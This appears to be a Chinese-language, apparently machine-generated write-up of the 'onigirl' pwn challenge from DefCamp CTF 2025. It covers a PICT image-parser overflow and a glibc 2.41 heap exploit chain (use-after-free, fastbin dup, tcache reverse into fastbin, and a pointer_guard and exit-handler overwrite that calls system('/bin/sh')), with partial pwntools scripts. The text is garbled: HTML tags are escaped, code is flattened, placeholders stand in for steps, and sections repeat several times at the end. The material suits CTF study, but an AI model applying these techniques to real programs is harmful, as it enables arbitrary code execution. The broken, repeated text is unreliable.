以下是基于您提供的链接内容，整理出的关于 DefCamp CTF 2025 onigirl<\/strong> 题目的详细技术复盘与利用教学文档。本文档将系统性地分析题目背景、漏洞成因、利用链构建过程，并给出完整的利用代码（EXP），适用于具备一定二进制安全基础的读者深入学习。<\/p>

一、题目概述<\/h2>

来源<\/strong>：DefCamp CTF 2025（2025年9月14日）<\/li>
题型<\/strong>：Pwn（困难级别）<\/li>
保护机制<\/strong>：全开（Canary、NX、PIE、Full RELRO）<\/li>
环境<\/strong>：GLIBC 2.41<\/li>
解题队伍数量<\/strong>：仅11支队伍成功解出<\/li> <\/ul>

二、程序流程分析<\/h2>
1. 前半部分：图像处理与权限生成<\/h3>
程序主体流程如下：<\/p>
int<\/span> main<\/span>() { <\/span><\/span> \/\/ 1. 读取用户输入的图像数据（自定义大小和内容） <\/span><\/span><\/span><\/span> \/\/ 2. 使用 stbi_load_from_memory() 解析图像为RGB格式 <\/span><\/span><\/span><\/span> \/\/ 3. 进行复杂的浮点运算与像素变换： <\/span><\/span><\/span><\/span> \/\/ - 基于像素到中心距离的颜色调整 <\/span><\/span><\/span><\/span> \/\/ - 随机扰动影响颜色计算 <\/span><\/span><\/span><\/span> \/\/ - 幂函数与参数矩阵非线性变换 <\/span><\/span><\/span><\/span> \/\/ - XOR\/NOT 噪声引入 <\/span><\/span><\/span><\/span> \/\/ 4. 生成 privilege 值，决定后续菜单功能的可用性 <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>关键变量：<\/h4> uint16_t<\/span> privilege_value; \/\/ 目标：使其为0 <\/span><\/span><\/span><\/span>float<\/span> modification_parameters_1[11<\/span>]; \/\/ 相邻数组，可能溢出影响 privilege_value <\/span><\/span><\/span><\/code><\/pre>溢出点分析：<\/h4> 在 stbi__pic_load()<\/code> 函数中，存在如下循环：<\/p> for<\/span> (int<\/span> i =<\/span> 0<\/span>; i <<\/span> 11<\/span>; i++<\/span>) { <\/span><\/span> image_modifications_ptr[i] =<\/span> image_noises[i]; \/\/ 可能溢出到 privilege_value <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>若 image_noises[10]<\/code> 的第二个字节为 0x13<\/code>，则可覆盖 privilege_value<\/code> 为 0x1337<\/code>，进而通过后续运算得到 privilege = 0<\/code>。<\/p> 图像结构构造：<\/h4> 需构造一个合法的PICT格式图像：<\/p> 文件头："PICT"<\/code><\/li> 偏移 0x53<\/code> 处："PICT"<\/code><\/li> 偏移 0x5C<\/code>：大端序宽度（width），需为 0x55<\/code>（经测试得出）<\/li> 偏移 0x5E<\/code>：大端序高度（height）<\/li> 数据部分：循环写入以下8字节组合： [0x00, 0xF0, 0x0F, 0x00]<\/code> 和 [0x0A, 0xF0, 0x0F, 0x00]<\/code> 交替<\/li> <\/ul> <\/li> 目的是通过计算使 image_noises[10]<\/code> 的第二个字节为 0x13<\/code><\/li> <\/ul> 前半EXP代码（Python）：<\/h4> from<\/span> pwn import<\/span> *<\/span> <\/span><\/span> <\/span><\/span>def<\/span> build_image<\/span>(): <\/span><\/span> header =<\/span> b<\/span>"PICT"<\/span>.<\/span>ljust(0x53<\/span>, b<\/span>"<\/span>\x00<\/span>"<\/span>) +<\/span> b<\/span>"PICT"<\/span> <\/span><\/span> width =<\/span> 0x55<\/span> <\/span><\/span> height =<\/span> 0x100<\/span> <\/span><\/span> header +=<\/span> p16(width, endian=<\/span>'big'<\/span>) +<\/span> p16(height, endian=<\/span>'big'<\/span>) <\/span><\/span> header +=<\/span> b<\/span>"<\/span>\x00<\/span>"<\/span> *<\/span> 8<\/span> <\/span><\/span> data =<\/span> b<\/span>""<\/span> <\/span><\/span> for<\/span> i in<\/span> range(width *<\/span> 10<\/span>): # 循环次数需足够大<\/span> <\/span><\/span> if<\/span> i %<\/span> 2<\/span> ==<\/span> 0<\/span>: <\/span><\/span> data +=<\/span> b<\/span>"<\/span>\x00\xF0\x0F\x00<\/span>"<\/span> <\/span><\/span> else<\/span>: <\/span><\/span> data +=<\/span> b<\/span>"<\/span>\x0A\xF0\x0F\x00<\/span>"<\/span> <\/span><\/span> return<\/span> header +<\/span> data <\/span><\/span> <\/span><\/span>while<\/span> True<\/span>: <\/span><\/span> p =<\/span> process(".\/onigirl"<\/span>) <\/span><\/span> p.<\/span>sendlineafter("size:"<\/span>, str(len(build_image()))) <\/span><\/span> p.<\/span>sendafter("data:"<\/span>, build_image()) <\/span><\/span> # 检查是否成功设置 privilege=0<\/span> <\/span><\/span> # 若成功则进入后续菜单交互<\/span> <\/span><\/span><\/code><\/pre> 三、后半部分：堆菜单与利用<\/h2> 1. 菜单功能：<\/h3> do_alloc(size)<\/code>：申请 0x70<\/code> 的 chunk（size ∈ [0, 0x5F]），最多11个<\/li> do_delete(idx)<\/code>：UAF 漏洞（指针未置空）<\/li> do_show(idx)<\/code>：泄露8字节数据<\/li> <\/ul> 2. 利用目标：<\/h3> 泄露堆地址与libc地址<\/li> 实现任意地址写<\/li> 劫持控制流<\/li> <\/ul> 3. 关键利用技巧：<\/h3> a) Tcache Reverse Into Fastbin（GLIBC 2.41）<\/h4> 当申请大小相同的 chunk 时：<\/p> 若 tcache 为空且 fastbin 非空，则取出 fastbin 头部 chunk（victim）<\/li> 若 tcache 未满，则将 fastbin 中剩余 chunk 移入 tcache<\/li> 分配 victim<\/li> <\/ul> b) Fastbin Dup：<\/h4> 通过 double free 构造循环链表： A → B → A<\/code><\/p> c) 组合利用：<\/h4> 申请10个 chunk（A0-A9）<\/li> 释放7个填入 tcache，再释放3个填入 fastbin<\/li> 重新申请7个清空 tcache<\/li> 通过 double free 构造 fastbin 循环链表：A → B → A<\/code><\/li> 再次申请时触发 Tcache Reverse Into Fastbin：分配 A<\/li> 将 B 和 A 移入 tcache<\/li> 若控制 A 的 fd 指向目标地址（需满足解密后为0），则可实现任意地址分配<\/li> <\/ul> <\/li> <\/ol> d) 泄露libc：<\/h4> 伪造 unsortedbin size 的 chunk<\/li> 释放后通过 UAF 读取 libc 地址<\/li> <\/ul> e) 劫持控制流（exit攻击向量）：<\/h4> 目标：修改 pointer_guard<\/code>（位于 fs:[0x30]<\/code>）为0，从而绕过指针加密。通过任意地址写修改 initial<\/code> 结构体（位于libc中），使其指向目标函数。<\/p> initial 结构体伪造：<\/h5> typedef<\/span> struct<\/span> { <\/span><\/span> uint64_t<\/span> fn_ptr; \/\/ 需为 (target_func >> 0x11) | (target_func << (64 - 0x11)) <\/span><\/span><\/span><\/span> uint64_t<\/span> arg; <\/span><\/span> uint64_t<\/span> dso_handle; <\/span><\/span>} exit_function_cxa; <\/span><\/span><\/code><\/pre> 四、完整EXP（后半部分）<\/h2> from<\/span> pwn import<\/span> *<\/span> <\/span><\/span> <\/span><\/span>context(arch=<\/span>"amd64"<\/span>, os=<\/span>"linux"<\/span>, log_level=<\/span>"debug"<\/span>) <\/span><\/span> <\/span><\/span>def<\/span> alloc<\/span>(size): <\/span><\/span> p.<\/span>sendlineafter(">"<\/span>, "1"<\/span>) <\/span><\/span> p.<\/span>sendlineafter("size:"<\/span>, str(size)) <\/span><\/span> <\/span><\/span>def<\/span> free<\/span>(idx): <\/span><\/span> p.<\/span>sendlineafter(">"<\/span>, "2"<\/span>) <\/span><\/span> p.<\/span>sendlineafter("index:"<\/span>, str(idx)) <\/span><\/span> <\/span><\/span>def<\/span> show<\/span>(idx): <\/span><\/span> p.<\/span>sendlineafter(">"<\/span>, "3"<\/span>) <\/span><\/span> p.<\/span>sendlineafter("index:"<\/span>, str(idx)) <\/span><\/span> return<\/span> p.<\/span>recvuntil("<\/span>\n<\/span>"<\/span>, drop=<\/span>True<\/span>) <\/span><\/span> <\/span><\/span># 启动进程并绕过前半部分<\/span> <\/span><\/span>p =<\/span> process(".\/onigirl"<\/span>) <\/span><\/span># 发送构造好的图像数据，直至 privilege=0<\/span> <\/span><\/span># ...<\/span> <\/span><\/span> <\/span><\/span># 进入堆菜单交互<\/span> <\/span><\/span>alloc(0x50<\/span>) # 初始化大小<\/span> <\/span><\/span> <\/span><\/span># 构造10个chunk<\/span> <\/span><\/span>for<\/span> i in<\/span> range(10<\/span>): <\/span><\/span> alloc(0x50<\/span>) <\/span><\/span> <\/span><\/span># 释放7个填入tcache<\/span> <\/span><\/span>for<\/span> i in<\/span> range(7<\/span>): <\/span><\/span> free(i) <\/span><\/span> <\/span><\/span># 释放3个填入fastbin<\/span> <\/span><\/span>for<\/span> i in<\/span> range(7<\/span>, 10<\/span>): <\/span><\/span> free(i) <\/span><\/span> <\/span><\/span># 清空tcache<\/span> <\/span><\/span>for<\/span> i in<\/span> range(7<\/span>): <\/span><\/span> alloc(0x50<\/span>) <\/span><\/span> <\/span><\/span># Fastbin Dup: 构造 A->B->A<\/span> <\/span><\/span>free(0<\/span>) <\/span><\/span>free(1<\/span>) <\/span><\/span>free(0<\/span>) <\/span><\/span> <\/span><\/span># 修改fd指向目标地址（如heap_base+xxx）<\/span> <\/span><\/span>payload =<\/span> p64(0<\/span>) *<\/span> 2<\/span> # 满足解密后为0<\/span> <\/span><\/span># 写入选定的chunk<\/span> <\/span><\/span> <\/span><\/span># 触发Tcache Reverse Into Fastbin<\/span> <\/span><\/span>alloc(0x50<\/span>) <\/span><\/span> <\/span><\/span># 泄露libc<\/span> <\/span><\/span># ...<\/span> <\/span><\/span> <\/span><\/span># 修改pointer_guard为0<\/span> <\/span><\/span>pg_addr =<\/span> libc_base -<\/span> 0x2880<\/span> +<\/span> 0x30<\/span> <\/span><\/span># 通过任意地址写修改pg_addr值为0<\/span> <\/span><\/span> <\/span><\/span># 伪造initial结构体<\/span> <\/span><\/span>initial_addr =<\/span> libc_base +<\/span> 0x1f40c0<\/span> # 示例地址<\/span> <\/span><\/span>system_addr =<\/span> libc_base +<\/span> libc.<\/span>sym.<\/span>system <\/span><\/span>bin_sh_addr =<\/span> libc_base +<\/span> next(libc.<\/span>search(b<\/span>"\/bin\/sh"<\/span>)) <\/span><\/span> <\/span><\/span># 构造函数指针：ROL(system_addr, 0x11)<\/span> <\/span><\/span>fn_ptr =<\/span> (system_addr >><\/span> 0x11<\/span>) |<\/span> (system_addr <<<\/span> (64<\/span> -<\/span> 0x11<\/span>)) <\/span><\/span>payload =<\/span> p64(fn_ptr) +<\/span> p64(bin_sh_addr) +<\/span> p64(0<\/span>) <\/span><\/span># 写入initial_addr<\/span> <\/span><\/span> <\/span><\/span># 触发退出流程<\/span> <\/span><\/span>p.<\/span>sendlineafter(">"<\/span>, "4"<\/span>) <\/span><\/span>p.<\/span>interactive() <\/span><\/span><\/code><\/pre> 五、参考资料<\/h2> GLIBC 2.41 源码<\/li> 题目二进制文件：onigirl<\/li> 相关函数：stbi_load_from_memory<\/code>、stbi__pic_load<\/code>、malloc<\/code>、free<\/code>、exit<\/code><\/li> <\/ol> 若有任何疑问或进一步讨论，欢迎在评论区留言。<\/p>

二、程序流程分析<\/h2>

三、后半部分：堆菜单与利用<\/h2>

3. 关键利用技巧：<\/h3>

b) Fastbin Dup：<\/h4>
通过 double free 构造循环链表：
`A → B → A<\/code><\/p>`

e) 劫持控制流（exit攻击向量）：<\/h4>
目标：修改 `pointer_guard<\/code>（位于 fs:[0x30]<\/code>）为0，从而绕过指针加密。通过任意地址写修改 initial<\/code> 结构体（位于libc中），使其指向目标函数。<\/p>`

五、参考资料<\/h2>

GLIBC 2.41 源码<\/li>
题目二进制文件：onigirl<\/li>
相关函数：`stbi_load_from_memory<\/code>、stbi__pic_load<\/code>、malloc<\/code>、free<\/code>、exit<\/code><\/li> <\/ol> 若有任何疑问或进一步讨论，欢迎在评论区留言。<\/p>`

二、程序流程分析<\/h2>

三、后半部分：堆菜单与利用<\/h2>

3. 关键利用技巧：<\/h3>

b) Fastbin Dup：<\/h4> 通过 double free 构造循环链表： A → B → A<\/code><\/p>

e) 劫持控制流（exit攻击向量）：<\/h4> 目标：修改 pointer_guard<\/code>（位于 fs:[0x30]<\/code>）为0，从而绕过指针加密。 通过任意地址写修改 initial<\/code> 结构体（位于libc中），使其指向目标函数。<\/p>

五、参考资料<\/h2> GLIBC 2.41 源码<\/li> 题目二进制文件：onigirl<\/li> 相关函数：stbi_load_from_memory<\/code>、stbi__pic_load<\/code>、malloc<\/code>、free<\/code>、exit<\/code><\/li> <\/ol> 若有任何疑问或进一步讨论，欢迎在评论区留言。<\/p>

b) Fastbin Dup：<\/h4>
通过 double free 构造循环链表：
`A → B → A<\/code><\/p>`

e) 劫持控制流（exit攻击向量）：<\/h4>
目标：修改 `pointer_guard<\/code>（位于 fs:[0x30]<\/code>）为0，从而绕过指针加密。通过任意地址写修改 initial<\/code> 结构体（位于libc中），使其指向目标函数。<\/p>`

五、参考资料<\/h2>

GLIBC 2.41 源码<\/li>
题目二进制文件：onigirl<\/li>
相关函数：`stbi_load_from_memory<\/code>、stbi__pic_load<\/code>、malloc<\/code>、free<\/code>、exit<\/code><\/li> <\/ol> 若有任何疑问或进一步讨论，欢迎在评论区留言。<\/p>`